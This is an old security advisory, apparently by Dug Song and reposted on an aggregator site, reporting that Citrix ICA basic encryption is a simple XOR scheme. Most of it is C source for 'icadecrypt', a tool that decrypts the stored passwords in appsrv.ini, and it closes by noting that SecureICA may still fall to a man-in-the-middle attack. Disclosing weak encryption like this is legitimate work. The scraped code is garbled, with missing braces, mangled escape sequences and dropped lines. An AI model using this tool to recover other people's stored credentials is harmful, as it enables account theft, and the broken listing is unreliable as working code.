Citrix ICA's basic encryption has been cracked

来源:互联网 发布:查看linux安装的字体 编辑:程序博客网 时间:2024/04/30 08:08

The ICA basic encryption algorithm is a variant of the simple XOR scheme used for saved Winframe passwords:

void decrypt(u_char key, u_char *p, int len)
  int i;

  for (i = len; i > 0; i--)
    p[i] = p[i-1] ^ p[i] ^ key;

  p[0] ^= (key | 'C');

The following will decrypt stored Citrix ICA passwords (in appsrv.ini).

  Dug Song <>

#include <sys/types.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

hex_decode(char *src, u_char *dst, int outsize)
  char *p, *pe;
  u_char *q, *qe, ch, cl;
  pe = src + strlen(src);
  qe = dst + outsize;

  for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) {
    ch = tolower(p[0]);
    cl = tolower(p[1]);
    if ((ch >= '0') && (ch <= '9')) ch -= '0';
    else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10;
    else return (-1);
    if ((cl >= '0') && (cl <= '9')) cl -= '0';
    else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10;
    else return (-1);
    *q++ = (ch << 4) | cl;
  return (q - dst);

ica_decrypt(u_char *pass, int len)
  u_short i;
  u_char *p, key;

  if (len < 4)
    return (0);

  i = ntohs(*(u_short *)pass);
  if (i != len - 2)
    return (0);
  key = pass[2];
  p = pass + 3;
  for (i -= 2; i > 0; i--)
    p[i] = p[i - 1] ^ p[i] ^ key;

  p[0] ^= (key | 'C');
  i = len - 3;
  memmove(pass, pass + 3, i);
  pass[i] = '/0';
  return (1);

  fprintf(stderr, "Usage: icadecrypt <file>/n");

main(int argc, char *argv[])
  FILE *f;
  u_char line[1024], pass[128];
  int len;

  if (argc != 2 || *argv[1] == '-')

  if ((f = fopen(argv[1], "r")) == NULL) {
  while (fgets(line, sizeof(line), f) != NULL) {
    if (strncmp(line, "Password=", 9) == 0) {
      len = hex_decode(line + 9, pass, sizeof(pass));
      if (ica_decrypt(pass, len))
        printf("; icadecrypt: [%s]/n", pass);
    printf("%s", line);


/* 5000. */

Demonstration code to sniff (and decrypt) ICA network authentication is available at:

Citrix offers a secure alternative called SecureICA, which uses Diffie-Hellman for key exchange and RC5 to encrypt the underlying transport (now at 128-bit strength worldwide). While this is certainly better than the simple XOR scheme outlined above, it may still be vulnerable to an active man-in-the-middle attack. Caveat user.
(NOTE: The SecureICA supported client is only available for Windows)